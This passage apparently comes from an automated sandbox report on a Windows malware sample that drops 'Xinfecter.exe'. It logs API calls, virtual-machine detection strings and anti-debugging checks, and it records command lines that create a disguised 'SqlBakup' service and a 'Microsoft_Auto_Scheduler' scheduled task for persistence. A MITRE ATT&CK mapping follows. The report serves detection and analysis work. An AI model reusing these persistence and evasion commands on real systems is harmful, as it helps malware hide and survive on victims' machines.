        Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
        Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | API coverage: 8.4 %
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | API coverage: 2.3 %
        Source: C:\Windows\SysWOW64\timeout.exe TID: 5820 | Thread sleep count: 123 > 30
        Source: C:\Windows\SysWOW64\timeout.exe TID: 6276 | Thread sleep count: 131 > 30
        Source: C:\Windows\SysWOW64\timeout.exe TID: 4916 | Thread sleep count: 130 > 30
        Source: C:\Windows\SysWOW64\timeout.exe TID: 4492 | Thread sleep count: 132 > 30
        Source: C:\Windows\SysWOW64\timeout.exe TID: 6520 | Thread sleep count: 128 > 30
        Source: C:\Windows\SysWOW64\timeout.exe TID: 4784 | Thread sleep count: 132 > 30
        Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\SysWOW64\sc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\SysWOW64\sc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | File Volume queried: C:\ FullSizeInformation
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | File Volume queried: \Device\CdRom0\ FullSizeInformation
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008CA2AA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW, 1_2_008CA2AA
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0097C26B FindFirstFileExA, 1_2_0097C26B
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008C8A30 SetErrorMode,FindFirstFileW, 1_2_008C8A30
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008C8B70 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW, 1_2_008C8B70
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008CB740 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose, 1_2_008CB740
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002DC26B FindFirstFileExA, 42_2_002DC26B
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0022A2AA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW, 42_2_0022A2AA
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00228A30 SetErrorMode,FindFirstFileW, 42_2_00228A30
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00228B70 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW, 42_2_00228B70
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0022B740 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose, 42_2_0022B740
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008CE140 GetLogicalDriveStringsA, 1_2_008CE140
        Source: 8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWV
        Source: wscript.exe, 0000000E.00000003.2285859130.0000000002D57000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
        Source: wscript.exe, 0000000E.00000003.2285859130.0000000002D57000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y83
        Source: 8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, 8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
        Source: wscript.exe, 00000023.00000002.2327132615.0000025DC47DF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yG
        Source: C:\Windows\SysWOW64\tasklist.exe | Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0094216A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0094216A
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_009508CF LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_009508CF
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00961689 mov eax, dword ptr fs:[00000030h] 1_2_00961689
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002C1689 mov eax, dword ptr fs:[00000030h] 42_2_002C1689
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008EE290 GetProcessHeap,HeapFree, 1_2_008EE290
        Source: C:\Windows\SysWOW64\tasklist.exe | Process token adjusted: Debug
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0094216A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0094216A
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_009422CC SetUnhandledExceptionFilter, 1_2_009422CC
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00965768 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00965768
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00941F6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00941F6D
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002A216A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_002A216A
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002A22CC SetUnhandledExceptionFilter, 42_2_002A22CC
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002C5768 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_002C5768
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002A1F6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 42_2_002A1F6D
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
        Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
        Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /i "os name"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /v
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreak
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "original"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I /c "dcdcf"
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008D45A0 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,LocalFree,LocalFree,LocalFree,FreeSid,CloseHandle,CloseHandle,CloseHandle,1_2_008D45A0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008D45A0 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,LocalFree,LocalFree,LocalFree,FreeSid,CloseHandle,CloseHandle,CloseHandle,1_2_008D45A0
Source: Xinfecter.exe, 0000002A.00000002.2363142153.000000000093F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerwClass.0
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00941905 cpuid 1_2_00941905
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: ___crtGetLocaleInfoEx,1_2_0093C838
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: GetLocaleInfoW,1_2_0093CB44
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_0097ED0A
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: EnumSystemLocalesW,1_2_0097EF82
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: EnumSystemLocalesW,1_2_0097EFCD
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_0097F0F5
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: EnumSystemLocalesW,1_2_0097F068
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: GetLocaleInfoW,1_2_0097F345
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: EnumSystemLocalesW,1_2_00973430
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_0097F46E
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: GetLocaleInfoW,1_2_0097F575
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_0097F642
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: GetLocaleInfoW,1_2_00973919
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: ___crtGetLocaleInfoEx,42_2_0029C838
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,42_2_0029CB44
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,42_2_002DED0A
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: EnumSystemLocalesW,42_2_002DEF82
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: EnumSystemLocalesW,42_2_002DEFCD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: EnumSystemLocalesW,42_2_002DF068
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,42_2_002DF0F5
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,42_2_002DF345
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: EnumSystemLocalesW,42_2_002D3430
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,42_2_002DF46E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,42_2_002DF575
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,42_2_002DF642
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: GetLocaleInfoW,42_2_002D3919
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_009423EB GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_009423EB
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008C3EB0 GetUserNameW,1_2_008C3EB0
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0097BC62 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,1_2_0097BC62
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00946FA3 GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,1_2_00946FA3
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_00952887 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,1_2_00952887
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008B1020 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,1_2_008B1020
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_008B12E0 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,1_2_008B12E0
Source: C:\Users\user\Desktop\8AbMCL2dxM.exe | Code function: 1_2_0095357D Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,1_2_0095357D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002B2887 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,42_2_002B2887
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00211020 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,42_2_00211020
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002112E0 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,42_2_002112E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_002B357D Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,42_2_002B357D
MITRE ATT&CK Matrix, listed per tactic; a number in parentheses is the count of matched signatures for that technique, techniques without a number had no match:
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Scripting (12); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: Replication Through Removable Media (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: Windows Management Instrumentation (231); Native API (1); Scheduled Task/Job (1); Service Execution (1); Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: Scripting (12); DLL Side-Loading (1); Windows Service (11); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (12); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: DLL Side-Loading (1); Windows Service (11); Process Injection (12); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (12); RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1); File Deletion (1); Masquerading (11); Virtualization/Sandbox Evasion (13); Process Injection (12); Indicator Removal (1); HTML Smuggling; Dynamic API Resolution; Stripped Payloads
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: System Time Discovery (2); Peripheral Device Discovery (11); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (58); Network Share Discovery (1); Security Software Discovery (241); Virtualization/Sandbox Evasion (13); Process Discovery (3); System Owner/User Discovery (1); System Network Configuration Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: Ingress Tool Transfer (2); Encrypted Channel (2); Non-Standard Port (11); Non-Application Layer Protocol (2); Application Layer Protocol (2); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
